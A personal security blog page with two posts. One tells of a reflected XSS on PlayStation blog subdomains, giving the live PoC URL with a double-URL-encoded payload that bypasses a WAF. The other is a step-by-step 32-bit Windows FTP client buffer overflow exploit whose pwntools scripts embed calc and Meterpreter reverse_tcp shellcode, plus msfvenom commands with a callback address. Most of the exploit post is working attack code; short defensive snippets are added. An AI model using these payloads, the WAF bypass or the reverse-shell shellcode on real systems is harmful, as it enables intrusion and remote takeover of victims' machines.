
Month: June 2020

Story of PlayStation (Sony) XSS

Hello all!!! Today I decided to share my finding of an XSS on a subdomain of PlayStation. It was about 1 year ago, I think. I started hunting bugs on Sony websites and first I found directory indexing on:

  • https://blog.latam.playstation.com/wp-content/
  • https://blog.latam.playstation.com/wp/wp-includes/
  • https://blog.us.playstation.com/wp/wp-includes/
  • https://blog.us.playstation.com/wp-content/
  • https://blog.br.playstation.com/wp/wp-includes/
  • https://blog.br.playstation.com/wp-content/
  • https://rd.playstation.com/

Then I reported it to Sony and they didn’t accept it because they could not find any impact. I didn’t understand why they said that :3 and I was like, okay. Then I tried to dig more into the folders and found this page [ https://blog.latam.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html ]. I found QUnit 1.21.0 on the page and decided to look for an exploit on Google. Then I found this page.

There are two PoCs, and the 2nd PoC shows that the parameter testId is vulnerable to XSS. So I decided to give it a try. First I injected the payload <svg onload=alert(1)> and the WAF filtered it. Then I fuzzed a lot and at last, boom! Double URL encoding bypassed the WAF.

So the POC link is [ https://blog.us.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html?testId=%25%33%63%25%37%33%25%37%36%25%36%37%25%32%30%25%36%66%25%36%65%25%36%63%25%36%66%25%36%31%25%36%34%25%33%64%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39%25%36%65%25%32%39%25%33%65 ].
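The bypass works because the filter inspects the value before it has been fully decoded. As an added example (not code from the original post), the Python below decodes the testId value from the PoC link above and compares a filter that percent-decodes once with one that canonicalizes the input by decoding until it stops changing; the tag pattern and the round limit are my own assumptions.

```python
import re
from urllib.parse import unquote

# The testId value from the PoC link above: "<svg onload=alert(document.domain)>"
# with every byte percent-encoded twice.
DOUBLE_ENCODED = (
    "%25%33%63%25%37%33%25%37%36%25%36%37%25%32%30%25%36%66%25%36%65%25%36%63%25%36%66"
    "%25%36%31%25%36%34%25%33%64%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38"
    "%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65"
    "%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39%25%36%65%25%32%39%25%33%65"
)

# Assumed filter rule: an opening tag, or an on*= event handler attribute.
TAG_PATTERN = re.compile(r"<\s*[a-z]|\bon[a-z]+\s*=", re.IGNORECASE)


def single_decode_filter(value):
    """Naive WAF-style check: percent-decode once, then match. True means blocked."""
    return bool(TAG_PATTERN.search(unquote(value)))


def canonicalize(value, max_rounds=5):
    """Percent-decode until the value stops changing. The round limit (assumed)
    bounds the work done on adversarial input."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def canonical_filter(value):
    """Same rule, applied after canonicalization. True means blocked."""
    return bool(TAG_PATTERN.search(canonicalize(value)))
```

The single-decode filter sees only `%3c%73%76...` and lets the value through; canonicalizing first reduces it to the plain tag, which the same rule then blocks.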

Then I reported the bug; they replied after 3 months and rewarded me with swag that was never shipped to me :V.

That’s my story of XSS on PlayStation. Hope you like it. Thanks!!!

Windows Buffer Overflow (32bit ftp)

Today I will show how to exploit a 32-bit Windows buffer overflow. This is my first blog post.

What does buffer mean?

Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs.

Buffer Overflow?

A buffer overflow occurs when a program or process attempts to write more data to a fixed length block of memory, or buffer, than the buffer is allocated to hold. Since buffers are created to contain a defined amount of data, the extra data can overwrite data values in memory addresses adjacent to the destination buffer unless the program includes sufficient bounds checking to flag or discard data when too much is sent to a memory buffer.

Introduction

There are a lot of tutorials about this 32-bit FTP Windows buffer overflow, but I want to use modern tooling while exploiting it. Let’s start.

Requirements

  • You can download the 32bit ftp exe file here
  • You can test on any Windows version.
  • Immunity Debugger
  • Pwntools

First you need to load the 32bit ftp client in Immunity Debugger.

File > Open > select the ftp file and open it.

When I try to run it via the debugger, it asks me for an FTP server IP and port. So we need to create an FTP server and let the FTP client connect to us. Let’s create a simple FTP server using pwntools.

from pwn import *

# Listen on the FTP control port; the client will connect to us.
l = listen(21)

payload = b"Sent some strings"

_ = l.wait_for_connection()

# Send an FTP greeting (reply code 220) followed by our data.
l.sendline(b"220 " + payload)

Run it as root, because port 21 is a privileged port:

sudo python test.py

Important: once you run the debugger, every time you need to restart the debugger by pressing Ctrl+F2 or Debug tab > Restart.

Next step: let’s crash the FTP client with a bunch of “A”.

from pwn import *
l = listen(21)

# 1000 bytes of "A" (0x41) to overrun the buffer
payload = b"A" * 1000

_ = l.wait_for_connection()

l.sendline(b"220 " + payload)

Great! It crashed. When we look at EIP in the debugger, the stack is filled with a lot of “A” (EIP 41414141).

All of the registers have been overwritten by 41 (hex for A). This means that we have a buffer overflow vulnerability on our hands and we have proven that we can overwrite the EIP. At this point, we know that the EIP is located somewhere between 1 and 1000 bytes, but we are not sure where it’s located exactly. What we need to do next is figure out exactly where the EIP is located (in bytes) and attempt to control it.

Next step is to find the offset. Let’s find it.

from pwn import *

l = listen(21)

# De Bruijn pattern: every 4-byte window is unique, so the EIP value maps to one offset
payload = cyclic(1000)

_ = l.wait_for_connection()

l.sendline(b"220 " + payload)

Take the EIP value (786A6161) and look it up with cyclic_find(0x786A6161); the result is the offset.

Offset = 989

To execute shellcode, we need to find the address of a JMP ESP or CALL ESP instruction; we overwrite EIP with that address so execution jumps to the address stored in ESP, which points at our data. When you loaded the FTP client program in Immunity, you saw the kernel32.dll module was also loaded, so we look for such an instruction there.

!mona jmp -r esp -m kernel

You will see 3 jmp esp addresses and 2 call esp addresses. You can use any one of them; all of the addresses work. So let’s jump to that address with shellcode. First I will execute the calculator. After this I will show how to generate a reverse shell and exploit this. Let’s pop calculator.

To generate the calc shellcode using msfvenom:

msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b "\x00"

Note: This FTP client doesn’t have any bad characters, so I will not show you how to find bad characters the easy way and how to avoid them. But I will write about it in another post.

The goal is: Buffer + jmp esp + NOP + shellcode.

Why does this exploit contain NOPs?

Some attacks consist of making the program jump to a specific address and continue running from there. The injected code has to be loaded previously somehow in that exact location.

Stack randomization and other runtime differences may make the address where the program will jump impossible to predict, so the attacker places a NOP sled in a big range of memory. If the program jumps to anywhere into the sled, it will run all the remaining NOPs, doing nothing, and then will run the payload code, just next to the sled.

The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.

A 128-byte NOP sled is just a group of NOP instructions 128 bytes wide.

NOTE #1: NOP (No-OPeration) is an instruction available in most (all?) architectures that does nothing, other than occupying memory and some runtime.

NOTE #2: in architectures with variable length instructions, a NOP instruction is usually just one byte in length, so it can be used as a convenient instruction padding. Unfortunately, that also makes it easy to do a NOP sled.

Ref : https://stackoverflow.com/questions/14760587/how-does-a-nop-sled-work

Let’s go.

from pwn import *

# 989 bytes of filler to reach the saved return address
payload = b"\x41" * 989

# jmp esp address (from mona)
payload += p32(0x765A3132)
# NOP sled
payload += b"\x90" * 30
# calc.exe shellcode
payload += (
    b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
    b"\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
    b"\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
    b"\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    b"\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    b"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    b"\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
)
l = listen(21)
_ = l.wait_for_connection()

l.sendline(b"220 " + payload)
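From the defender’s side, the malformed 220 reply this exploit sends has several easily observed traits. As an added example (not part of the original post), the Python below checks one FTP reply line for those traits: an oversized reply, a long run of one filler byte, an x86 NOP sled, and non-printable bytes. The thresholds and the two sample replies are constructed for illustration; the suspicious sample follows the Buffer + jmp esp + NOP + shellcode layout above with placeholder bytes in place of shellcode.

```python
import re

# Assumed thresholds for this illustration (not from the write-up); tune per service.
MAX_REPLY_LEN = 512   # a greeting longer than this is far outside normal use
MIN_RUN = 16          # a run of one repeated byte this long looks like overflow filler
MIN_NOP_SLED = 8      # this many consecutive 0x90 (x86 NOP) bytes

# Constructed samples, not captured traffic: a normal greeting, and a reply laid out
# like the exploit above (filler + 4-byte JMP ESP address + NOP sled + placeholder).
BENIGN_REPLY = b"220 Welcome to the FTP service.\r\n"
SUSPICIOUS_REPLY = (
    b"220 "
    + b"A" * 989
    + b"\x32\x31\x5a\x76"          # little-endian form of the 0x765A3132 JMP ESP address
    + b"\x90" * 30
    + bytes(range(0x80, 0xa0))     # placeholder bytes standing in for shellcode
    + b"\r\n"
)


def inspect_ftp_reply(reply):
    """Return the list of indicator names found in one FTP server reply line.
    An empty list means nothing anomalous was seen."""
    findings = []
    body = reply.rstrip(b"\r\n")
    if len(body) > MAX_REPLY_LEN:
        findings.append("oversized-reply")
    # Long run of one byte, e.g. the "A" filler used to reach the saved return address.
    if re.search(rb"(.)\1{%d,}" % (MIN_RUN - 1), body, re.DOTALL):
        findings.append("repeated-byte-run")
    # x86 NOP sled: 0x90 repeated, the landing zone placed before the shellcode.
    if re.search(rb"\x90{%d,}" % MIN_NOP_SLED, body):
        findings.append("nop-sled")
    # Bytes outside printable ASCII: banners are text, machine code is not.
    if any(b < 0x20 or b > 0x7e for b in body):
        findings.append("non-printable-bytes")
    return findings


def suspicious(reply):
    """Convenience wrapper: True when any indicator fired."""
    return bool(inspect_ftp_reply(reply))
```

Any one indicator is enough to alert on; the benign greeting triggers none, the exploit-shaped reply triggers all four.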

Okay, calc.exe pops up successfully. Now I will generate the reverse shellcode using msfvenom, because I want to control this machine; popping calc isn’t enough for me :D….

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.255.232 LPORT=4444 -a x86 --platform win -e x86/alpha_mixed -f c -b '\x00'

Put the result in the Python script and run it.

from pwn import *
# 989 bytes of filler to reach the saved return address
payload = b"\x41" * 989
# jmp esp address (from mona; re-run it, since the kernel32 base can change between reboots)
payload += p32(0x771F3132)
# NOP sled
payload += b"\x90" * 30
# windows/meterpreter/reverse_tcp shellcode, x86/alpha_mixed encoded
payload += (
b"\x89\xe6\xd9\xea\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
b"\x59\x6c\x6a\x48\x4b\x32\x75\x50\x43\x30\x73\x30\x65\x30\x6c"
b"\x49\x6a\x45\x54\x71\x79\x50\x62\x44\x4c\x4b\x66\x30\x70\x30"
b"\x4e\x6b\x53\x62\x44\x4c\x4c\x4b\x31\x42\x54\x54\x4c\x4b\x63"
b"\x42\x44\x68\x46\x6f\x4c\x77\x53\x7a\x55\x76\x44\x71\x59\x6f"
b"\x4c\x6c\x65\x6c\x30\x61\x33\x4c\x46\x62\x46\x4c\x35\x70\x4a"
b"\x61\x5a\x6f\x56\x6d\x43\x31\x4a\x67\x58\x62\x49\x62\x61\x42"
b"\x30\x57\x6e\x6b\x62\x72\x42\x30\x6c\x4b\x30\x4a\x67\x4c\x6c"
b"\x4b\x62\x6c\x66\x71\x30\x78\x49\x73\x57\x38\x46\x61\x5a\x71"
b"\x72\x71\x6c\x4b\x61\x49\x71\x30\x37\x71\x6b\x63\x6c\x4b\x37"
b"\x39\x57\x68\x79\x73\x45\x6a\x30\x49\x4c\x4b\x64\x74\x4e\x6b"
b"\x67\x71\x79\x46\x30\x31\x39\x6f\x6e\x4c\x69\x51\x5a\x6f\x76"
b"\x6d\x36\x61\x6b\x77\x67\x48\x59\x70\x73\x45\x38\x76\x54\x43"
b"\x63\x4d\x7a\x58\x45\x6b\x51\x6d\x44\x64\x73\x45\x6d\x34\x46"
b"\x38\x6e\x6b\x50\x58\x64\x64\x76\x61\x69\x43\x35\x36\x4e\x6b"
b"\x44\x4c\x62\x6b\x6e\x6b\x52\x78\x75\x4c\x43\x31\x4a\x73\x4c"
b"\x4b\x47\x74\x6e\x6b\x77\x71\x4e\x30\x4b\x39\x31\x54\x65\x74"
b"\x55\x74\x43\x6b\x43\x6b\x35\x31\x51\x49\x63\x6a\x50\x51\x4b"
b"\x4f\x4b\x50\x71\x4f\x51\x4f\x50\x5a\x6c\x4b\x62\x32\x5a\x4b"
b"\x4e\x6d\x63\x6d\x72\x48\x56\x53\x55\x62\x73\x30\x53\x30\x35"
b"\x38\x34\x37\x70\x73\x67\x42\x63\x6f\x51\x44\x42\x48\x50\x4c"
b"\x44\x37\x54\x66\x35\x57\x6e\x69\x58\x68\x69\x6f\x68\x50\x6c"
b"\x78\x6c\x50\x46\x61\x33\x30\x53\x30\x46\x49\x69\x54\x46\x34"
b"\x36\x30\x75\x38\x46\x49\x6f\x70\x70\x6b\x35\x50\x4b\x4f\x4b"
b"\x65\x43\x5a\x46\x6a\x32\x48\x46\x6a\x76\x69\x69\x6f\x58\x68"
b"\x45\x38\x37\x72\x57\x70\x44\x51\x63\x6c\x6e\x69\x49\x76\x66"
b"\x30\x72\x70\x42\x70\x56\x30\x37\x30\x56\x30\x57\x30\x32\x70"
b"\x51\x78\x68\x6a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x49\x45\x7a"
b"\x37\x72\x4a\x32\x30\x50\x56\x31\x47\x62\x48\x7a\x39\x6d\x75"
b"\x53\x44\x33\x51\x69\x6f\x79\x45\x4b\x35\x4f\x30\x62\x54\x57"
b"\x7a\x6b\x4f\x62\x6e\x43\x38\x71\x65\x7a\x4c\x69\x78\x63\x57"
b"\x65\x50\x65\x50\x33\x30\x43\x5a\x63\x30\x63\x5a\x34\x44\x53"
b"\x66\x30\x57\x42\x48\x44\x42\x5a\x79\x6b\x78\x31\x4f\x49\x6f"
b"\x7a\x75\x6e\x63\x79\x68\x63\x30\x53\x4e\x76\x56\x4c\x4b\x55"
b"\x66\x63\x5a\x47\x30\x65\x38\x63\x30\x34\x50\x55\x50\x35\x50"
b"\x61\x46\x63\x5a\x73\x30\x33\x58\x53\x68\x6f\x54\x51\x43\x5a"
b"\x45\x39\x6f\x7a\x75\x4d\x43\x72\x73\x71\x7a\x63\x30\x31\x46"
b"\x43\x63\x71\x47\x52\x48\x63\x32\x79\x49\x39\x58\x43\x6f\x69"
b"\x6f\x6b\x65\x4c\x43\x6b\x48\x35\x50\x33\x4d\x65\x78\x52\x78"
b"\x35\x38\x55\x50\x63\x70\x35\x50\x47\x70\x50\x6a\x77\x70\x70"
b"\x50\x43\x58\x56\x6b\x36\x4f\x56\x6f\x76\x50\x79\x6f\x49\x45"
b"\x36\x37\x32\x48\x34\x35\x72\x4e\x42\x6d\x73\x51\x39\x6f\x6a"
b"\x75\x31\x4e\x33\x6e\x69\x6f\x66\x6c\x66\x44\x44\x4f\x4e\x65"
b"\x42\x50\x39\x6f\x49\x6f\x69\x6f\x59\x79\x6f\x6b\x6b\x4f\x39"
b"\x6f\x59\x6f\x56\x61\x6a\x63\x76\x49\x49\x56\x64\x35\x59\x51"
b"\x69\x53\x6f\x4b\x78\x70\x6c\x75\x6c\x62\x70\x56\x63\x5a\x63"
b"\x30\x61\x43\x49\x6f\x5a\x75\x41\x41"
)
l = listen(21)
_ = l.wait_for_connection()
l.sendline(b"220 " + payload)

Wait for the connection in another terminal.

Gotcha..!!!

Let’s break!

Exploit development is a long journey. It’s endless; we just need to run. 😀 😀

If you face any trouble during testing, just ping me.

./ht00lay
